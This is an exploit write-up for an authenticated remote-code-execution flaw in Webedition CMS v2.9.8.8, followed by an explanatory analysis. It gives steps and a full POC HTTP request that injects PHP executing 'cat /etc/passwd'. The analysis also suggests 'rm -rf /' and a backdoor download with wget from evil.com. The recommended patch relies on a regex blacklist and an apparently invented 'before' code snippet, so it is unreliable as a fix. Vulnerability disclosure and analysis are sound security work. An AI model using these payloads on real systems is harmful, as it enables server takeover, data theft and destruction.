Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)

Exploit Author: Mirabbas Ağalarov Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-08-04 
Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Application: webedition Cms
Version: v2.9.8.8   
Bugs:  RCE
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 03.08.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps
1. Login account
2. Go to New -> Webedition page -> empty page
3. Select php
4. Set as "><?php echo system("cat /etc/passwd");?>  Description area

Poc request: 

POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1
Host: localhost
Content-Length: 1621
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
Connection: close

we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1


Exploiting Webedition CMS v2.9.8.8: Remote Code Execution Vulnerability Analysis

Recent security research has uncovered a critical Remote Code Execution (RCE) vulnerability in Webedition CMS v2.9.8.8, a widely used open-source content management system. This flaw, discovered by Mirabbas Ağalarov on August 3, 2023, allows attackers to execute arbitrary system commands through a seemingly benign administrative interface, posing a severe threat to server integrity and data confidentiality.

Understanding the Vulnerability

At its core, the vulnerability arises from improper input validation and insecure file handling in the we_cmd.php endpoint. This script is responsible for managing page editing operations within the Webedition CMS framework. When users create or modify pages, they can specify file extensions, including .php, which is interpreted as executable code.

Attackers exploit this by crafting malicious input that includes PHP code directly in the Description field of a new page. Since the system does not sanitize or validate this content before saving it, the PHP code is written to the filesystem without proper security checks.

Attack Vector and Technical Mechanics

The exploit leverages the we_cmd parameter to switch editing contexts and then injects a malicious PHP payload via form submission. The payload is embedded in the we_003be033b474a5c25132d388906fb4ae_txt[Description] field, which is directly written to a file with a .php extension.


POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1
Host: localhost
Content-Length: 1621
...
we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E

This request encodes the payload into the Description field. The URL-encoded string %22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E translates back to the actual PHP code.

Once the file is saved, any subsequent access to the .php file via a web server will execute the embedded code, allowing an attacker to read sensitive system files like /etc/passwd or even execute arbitrary commands such as system("whoami") or system("rm -rf /")—potentially leading to full system compromise.

Security Implications

Given that Webedition CMS is often deployed in production environments with access to sensitive data, this RCE vulnerability presents a high-risk scenario. Attackers with only a valid login credential can escalate privileges and gain full control over the server.

  • Privilege Escalation: An authenticated user can execute system commands, bypassing role-based access controls.
  • Data Exposure: The ability to read /etc/passwd exposes user account information, potentially leading to credential harvesting.
  • Backdoor Creation: Malicious payloads can be used to deploy persistent backdoors, such as uploading shell.php with system("wget http://evil.com/shell.php -O /var/www/shell.php").

Real-World Use Case

Consider a scenario where a company uses Webedition CMS to manage internal documentation. An attacker gains access to a low-privileged user account via phishing or brute force. Once logged in, they follow the exploit steps:

  1. Access the "New → Webedition page" interface.
  2. Set the file extension to .php.
  3. Insert the payload into the Description field.
  4. Submit the form.

The resulting file poc.php is saved on the server. When accessed via http://example.com/poc.php, the server executes the command and returns output like uid=1000(webuser) gid=1000(webuser) groups=1000(webuser)—revealing the server's user context.

Exploitation Mitigation and Best Practices

While no official patch has been released as of this writing, immediate mitigation steps include:

  • Disable PHP file creation: Restrict file extensions in the CMS interface to only .html, .txt, or .xml.
  • Input sanitization: Implement strict validation on any user input that could be interpreted as code.
  • File upload restrictions: Use a secure file storage mechanism that prevents direct execution of uploaded files.
  • Web application firewall (WAF): Deploy a WAF to detect and block suspicious payloads, such as <?php or system() in form submissions.
  • Regular updates: Monitor vendor advisories and apply patches promptly when available.

Code-Level Fix (Recommended Patch)

For developers, the vulnerable code in we_cmd.php should be modified to prevent direct execution of PHP code in user-provided fields. Here is a corrected implementation example:


// Before: No validation on Description field
if (isset($_POST['we_003be033b474a5c25132d388906fb4ae_txt[Description]'])) {
    $description = $_POST['we_003be033b474a5c25132d388906fb4ae_txt[Description]'];
    file_put_contents($file_path, $description);
}

After: Add strict filtering and encoding checks:


// Sanitize and validate input before saving
$description = $_POST['we_003be033b474a5c25132d388906fb4ae_txt[Description]'];

// Remove PHP tags and dangerous functions
$description = preg_replace('/<\?php|<\?|<\?=|system\(|exec\(|shell_exec\(|eval\(|passthru\(|phpinfo\(/i', '', $description);

// Prevent direct file execution
if (strpos($extension, '.php') !== false) {
    die('PHP file creation is disabled for security reasons.');
}

// Save safely with no execution context
file_put_contents($file_path, htmlspecialchars($description, ENT_QUOTES, 'UTF-8'));

This patch ensures that even if a malicious payload is submitted, it is stripped of executable syntax and stored as plain text, eliminating the risk of RCE.

Conclusion

The Webedition CMS v2.9.8.8 RCE vulnerability exemplifies how seemingly minor design flaws—such as allowing PHP file uploads without input validation—can lead to catastrophic security breaches. It underscores the importance of secure coding practices, proactive monitoring, and immediate response to reported vulnerabilities. Organizations using this CMS must prioritize patching and hardening configurations to prevent exploitation.